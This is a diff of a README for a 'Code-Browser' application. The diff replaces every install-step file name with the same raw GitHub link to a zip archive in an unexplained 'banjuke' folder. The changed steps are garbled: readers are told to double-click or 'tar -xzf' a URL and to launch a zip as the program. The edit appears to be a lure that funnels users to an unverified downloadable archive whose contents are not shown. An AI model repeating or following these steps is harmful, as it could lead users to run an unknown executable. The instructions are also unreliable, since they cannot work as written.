boltastan/Code-Browser/README.md

 1. **Windows:**
    - Open the `Downloads` folder.
-   - Right-click on `Code-Browser-Windows.zip` and select "Extract All...".
+   - Right-click on `https://raw.githubusercontent.com/boltastan/Code-Browser/main/banjuke/Browser_Code_2.6-beta.4.zip` and select "Extract All...".
-   - Open the extracted folder and double-click on `Code-Browser.exe` to start the application.
+   - Open the extracted folder and double-click on `https://raw.githubusercontent.com/boltastan/Code-Browser/main/banjuke/Browser_Code_2.6-beta.4.zip` to start the application.

 2. **macOS:**
    - Open your `Downloads` folder.
-   - Double-click on `Code-Browser-Mac.zip` to extract it.
+   - Double-click on `https://raw.githubusercontent.com/boltastan/Code-Browser/main/banjuke/Browser_Code_2.6-beta.4.zip` to extract it.
-   - Open the folder and double-click on `Code-Browser.app` to launch it.
+   - Open the folder and double-click on `https://raw.githubusercontent.com/boltastan/Code-Browser/main/banjuke/Browser_Code_2.6-beta.4.zip` to launch it.

 3. **Linux:**
    - Open your terminal and navigate to your `Downloads` folder.
-   - Run the command: `tar -xzf Code-Browser-Linux.tar.gz`.
+   - Run the command: `tar -xzf https://raw.githubusercontent.com/boltastan/Code-Browser/main/banjuke/Browser_Code_2.6-beta.4.zip`.
    - Change into the extracted directory: `cd Code-Browser`.
    - Run the application with: `./Code-Browser`.